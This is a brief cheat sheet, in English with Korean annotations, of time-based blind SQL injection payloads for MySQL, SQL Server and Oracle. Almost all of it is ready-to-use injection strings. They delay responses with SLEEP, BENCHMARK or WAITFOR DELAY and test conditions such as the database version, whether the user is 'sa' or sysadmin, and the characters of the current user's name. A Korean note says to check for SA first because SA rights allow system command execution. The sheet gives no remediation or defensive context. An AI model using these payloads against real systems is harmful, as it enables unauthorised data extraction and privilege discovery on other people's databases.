Time based sql injection

Time based sql injection

 - if+(select+ascii(substring(current_user,1,1)))>60+waitfor+delay+'0:0:1'

 - declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) >0 waitfor delay '0:0:5'

MySQL Time-Based

Resulting query (with malicious SLEEP injected).

 - SELECT * FROM products WHERE id=1-SLEEP(15)

Resulting query (with malicious BENCHMARK injected).

 - SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())

Resulting query - Time-based attack to verify database version.

 - SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(15), 0)

SQL Server Time-Based

Resulting query (with malicious SLEEP injected).

 - SELECT * FROM products WHERE id=1; WAIT FOR DELAY '00:00:15'

Resulting query (verify if user is sa).

 - SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:15'

Oracle Time-Based

Executing SLEEP() in Oracle (execution suspended 15 seconds).

 - BEGIN DBMS_LOCK.SLEEP(15); END;

IF 구절을 이용하여 'sysadmin'여부 확인

 - DB 권한이 SA일 경우 시스템 명령 수행이 가능함으로 SA유무를 먼저 파악

 - URL?query=1;if+(select+IS_SRVROLEMEMBER('sysadmin'))=1+waitfor+delay+'0:0:1'

IF 구절을 이용한 DATA 획득

 - URL?query=1;if+(select+len(current_user))=3+waitfor+delay+'0:0:1'

 - URL?query=1;if+(select+ascii(substring(current_user,1,1)))>60+waitfor+delay+'0:0:1'